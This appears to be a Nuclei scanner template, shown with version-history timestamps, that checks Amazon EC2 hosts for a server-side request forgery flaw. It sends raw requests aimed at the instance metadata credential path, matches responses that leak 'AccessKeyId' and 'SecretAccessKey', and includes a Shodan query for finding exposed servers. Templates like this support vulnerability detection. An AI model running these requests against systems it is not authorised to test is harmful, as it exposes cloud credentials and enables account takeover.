2022-12-18 14:23:30 +00:00
id : amazon-ec2-ssrf
2022-12-18 16:53:05 +00:00
2022-12-18 14:23:30 +00:00
info :
2022-12-22 05:33:37 +00:00
name : Amazon EC2 - Server-side request forgery (SSRF)
2022-12-18 14:23:30 +00:00
author : DhiyaneshDk
severity : critical
2024-01-02 15:45:12 +00:00
description : SSRF vulnerability exists in Amazon EC2, or Amazon Elastic Compute Cloud which is a web service provided by Amazon Web Services (AWS) that offers resizable compute capacity in the cloud.
2022-12-18 14:23:30 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score : 9.3
cwe-id : CWE-441
metadata :
2022-12-22 05:33:37 +00:00
verified : true
2023-10-14 11:27:55 +00:00
max-request : 2
2022-12-18 14:23:30 +00:00
shodan-query : "Server: EC2ws"
tags : aws,ec2,ssrf,amazon
2023-04-27 04:28:59 +00:00
http :
2022-12-18 14:23:30 +00:00
- raw :
- |+
GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1
Host : {{Hostname}}
2022-12-18 16:53:05 +00:00
- |+
2022-12-23 17:56:07 +00:00
@tls-sni : {{Hostname}}
2022-12-18 16:53:05 +00:00
GET http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1
Host : {{Hostname}}
stop-at-first-match : true
2022-12-18 14:23:30 +00:00
unsafe : true
2023-10-14 11:27:55 +00:00
2022-12-18 16:53:05 +00:00
matchers-condition : and
2022-12-18 14:23:30 +00:00
matchers :
- type : word
part : body
words :
- "AccessKeyId"
- "SecretAccessKey"
condition : and
2022-12-18 16:53:05 +00:00
- type : status
status :
- 200
2024-01-15 11:49:24 +00:00
# digest: 4b0a004830460221009f819ee1784d9fae5ec437af8582ba3ae0acdfec4fc0f17a406484bc5b571ca4022100f9eddb7733eeabc5bda330300d5f5906a4e407c981433a6da41ec854e6a00864:922c64590222798bb761d5b6d8e72950
